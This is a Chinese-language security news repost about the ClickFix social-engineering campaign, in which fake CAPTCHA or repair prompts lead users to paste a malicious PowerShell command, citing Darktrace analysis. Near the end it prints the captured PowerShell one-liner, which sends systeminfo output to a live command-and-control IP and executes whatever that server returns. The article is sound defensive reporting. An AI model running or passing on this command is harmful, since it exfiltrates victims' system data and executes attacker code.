攻击者利用新型ClickFix技术,诱导用户执行恶意代码

admin 2025年6月10日17:12:59评论26 views字数 1797阅读5分59秒阅读模式

更多全球网络安全资讯尽在邑安全

攻击者利用新型ClickFix技术,诱导用户执行恶意代码

网络安全研究人员发现了一种新型高级社会工程攻击活动,该攻击利用人们对日常计算机操作的基本信任心理。自2024年3月以来活跃的ClickFix技术,代表了网络犯罪战术的危险演变——通过攻击网络中最脆弱的环节(终端用户)来绕过传统安全措施。

这种欺骗性手法伪装成常规错误消息、CAPTCHA验证提示或系统维护通知,诱骗受害者在自己的系统上执行恶意代码。

攻击活动概况

该技术已在网络犯罪生态系统中迅速蔓延,吸引了从个体黑客到高级持续威胁(APT)组织的广泛关注,包括与俄罗斯和伊朗国家利益相关的APT28和MuddyWater组织。ClickFix攻击活动已成功入侵医疗保健、酒店、汽车制造和政府机构等多个行业,证明了这种以人为中心的攻击媒介具有普遍适用性。

Darktrace分析师在欧洲、中东、非洲和美国客户环境中均发现了ClickFix攻击案例,揭示了这一新兴威胁的全球性影响。调查显示,攻击者采用系统化攻击方式,利用鱼叉式钓鱼邮件、路过式下载(drive-by)攻击以及GitHub等可信平台的漏洞来投递恶意负载。

攻击手法剖析

攻击通常始于隐藏在电子邮件或被入侵合法网站恶意广告中的链接,这些链接会将毫无戒心的用户重定向到伪装成合法系统提示的恶意URL。ClickFix攻击利用用户解决表面技术问题的自然倾向进行心理操控。

受害者会遇到看似真实的虚假CAPTCHA提示或"修复"对话框,声称要解决网页显示错误或设备注册要求等虚构问题。一旦用户上钩,就会被引导完成看似标准的三步验证流程,最终导致系统执行恶意的PowerShell命令。

攻击影响范围

这些攻击造成的财务和运营影响远超初始系统入侵。在成功获得初始访问权限后,攻击者会在目标环境中建立命令控制(C2)通信通道,实现在网络中的横向移动,主要目的是获取并外泄敏感组织数据。攻击活动中经常部署与XWorm、Lumma和AsyncRAT等多个恶意软件家族相关的恶意负载。

感染机制技术分析

ClickFix攻击的技术复杂性不在于复杂的恶意软件开发,而在于社会工程与合法系统功能的无缝结合。攻击链始于受害者遇到精心设计的提示,指示他们按下Windows键+R打开运行对话框,然后按CTRL+V粘贴预加载的恶意PowerShell命令,最后按Enter键执行负载。

Darktrace对2025年4月9日一起特定攻击的调查揭示了该过程的技术细节。入侵行为启动了与命令控制基础设施的外部通信,触发了新的PowerShell用户代理检测,表明存在远程代码执行尝试。

攻击者利用新型ClickFix技术,诱导用户执行恶意代码

恶意PowerShell命令包含复杂的混淆技术和基于时间戳的文件命名约定。对攻击期间捕获的网络流量分析显示,通过数据包捕获检查可以了解PowerShell脚本的功能。该命令将当前时间转换为Unix时间戳格式,创建看似无害数字字符串的动态命名文件。

攻击者利用新型ClickFix技术,诱导用户执行恶意代码

例如,攻击生成名为"1744205184"的文件(对应执行时间戳),随后创建包含系统侦察数据的二级文件"1744205200"。

`$s=[int64](((datetime)::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffff0$b="193.36.38.237"$c='IRM'$d='POST'$e='Invoke-Expression'$f=$(systeminfo|out-string); &($c"$b`:8080/$s" -Method $d -Body $f -ContentType 'application/octet-stream'|&($e)`

这段PowerShell代码展示了攻击方法:先设置目标IP地址、HTTP方法和系统信息收集变量,然后将完整的设备详细信息传输到位于193.36.38.237的命令控制服务器。外泄数据包括完整的系统规格、网络配置、安全功能和硬件细节,为攻击者规划后续攻击阶段提供了广泛情报。

原文来自: cybersecuritynews.com

原文链接: https://cybersecuritynews.com/hackers-using-new-clickfix-technique/

原文始发于微信公众号(邑安全):攻击者利用新型ClickFix技术,诱导用户执行恶意代码

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月10日17:12:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   攻击者利用新型ClickFix技术,诱导用户执行恶意代码https://cn-sec.com/archives/4152299.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息